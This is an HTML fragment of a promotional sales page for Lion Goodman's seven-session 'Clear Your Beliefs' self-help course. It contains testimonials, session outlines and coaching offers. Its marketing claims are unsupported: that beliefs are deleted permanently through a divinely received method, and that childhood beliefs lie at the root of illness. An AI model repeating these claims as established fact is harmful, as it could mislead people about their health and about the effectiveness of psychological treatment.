</strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> 